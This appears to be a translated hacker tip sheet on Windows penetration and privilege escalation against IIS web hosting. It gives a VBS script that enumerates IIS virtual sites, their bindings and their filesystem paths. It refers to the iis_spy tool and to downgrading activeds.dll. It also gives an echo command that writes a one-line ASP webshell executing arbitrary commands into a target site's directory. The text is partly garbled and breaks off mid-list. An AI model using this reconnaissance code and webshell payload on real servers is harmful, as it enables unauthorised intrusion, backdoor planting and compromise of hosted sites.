This article summarizes multiple techniques for Windows penetration and Elevation of Privilege, including: MSSQL query analyzer connection record clearing, VNC and Radmin elevation method, Cmd directory operation skills and Webshell Elevation of Privilege tips.
Route questions:
1. Read website configuration.
2. Use the following VBS:
- On Error Resume Next
- If (LCase(Right(WScript.Fullname, 11)) = "wscript.exe") Then
- MsgBox Space(12) & "IIS Virtual Web Viewer" & Space(12) & Chr(13) & Space(9) & " Usage:Cscript vWeb.vbs", 4096, "Lilo"
- WScript.Quit
- End If
- Set objservice = GetObject("IIS://LocalHost/W3SVC")
- For Each obj3w In objservice
- If IsNumeric(obj3w.Name) Then
- Set OService = GetObject("IIS://LocalHost/W3SVC/" & obj3w.Name)
- Set VDirObj = OService.GetObject("IIsWebVirtualDir", "ROOT")
- If Err <> 0 Then WScript.Quit (1)
- WScript.Echo Chr(10) & "[" & OService.ServerComment & "]"
- For Each Binds In OService.ServerBindings
- Web = "{ " & Replace(Binds, ":", " } { ") & " }"
- WScript.Echo Replace(Split(Replace(Web, " ", ""), "}{")(2), "}", "")
- Next
- WScript.Echo "Path : " & VDirObj.Path
- End If
- Next
3. List iis_spy (Note: The ASPX and IISSPY methods must be supported: downgrade activeds. dll and activeds. tlb ).
4. Obtain the target site directory. You can use "echo ^ <% execute (request (" cmd ") % ^ >>> X: \ target directory \ X. asp or copy script file X: \ target directory \ X. asp is written into webshell like the target directory, or you can try the type command.
Possible website directory (Note: generally virtual host type ):
Data/htdocs. website/